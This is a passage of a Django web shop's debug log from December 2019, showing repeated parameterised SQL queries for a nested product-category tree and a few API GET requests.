"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:39:15,020 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:39:15,024 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:39:15,031 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:39:15,034 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:39:15,038 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:39:15,042 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:39:15,046 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:39:15,050 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:39:15,055 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:39:15,059 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:39:15,063 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:39:15,067 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:39:15,071 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:39:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:40:31,591 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 06:40:31,597 utils 4252 140031732287232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 06:40:31] "GET /api/v1/fire/ HTTP/1.0" 200 482 [20/Dec/2019 06:41:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:41:18,281 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:41:18,287 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:41:18,291 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:41:18,294 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:41:18,297 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:41:18,299 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:41:18,302 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:41:18,304 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:41:18,306 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:41:18,309 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:41:18,311 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:41:18,313 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:41:18,316 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:41:18,318 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:41:18,321 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:41:18,323 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:41:18,325 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:41:18,327 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:41:18,329 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:41:18,332 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:41:18,335 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:41:18,337 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:41:18,339 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:41:18,341 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:41:18,343 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:41:18,347 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:41:18,349 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:41:18,351 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:41:18,353 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:41:18,355 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:41:18,358 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:41:18,361 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:41:18,363 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:41:18,365 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:41:18,367 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:41:18,371 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:41:18,373 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:41:18,375 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:41:18,377 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:41:18,380 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:41:18,382 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:41:18,384 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:41:18,387 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:41:18,389 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:41:18,392 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:41:18,394 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:41:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:41:31,331 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:41:31,338 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:41:31,341 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:41:31,343 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:41:31,347 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:41:31,349 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 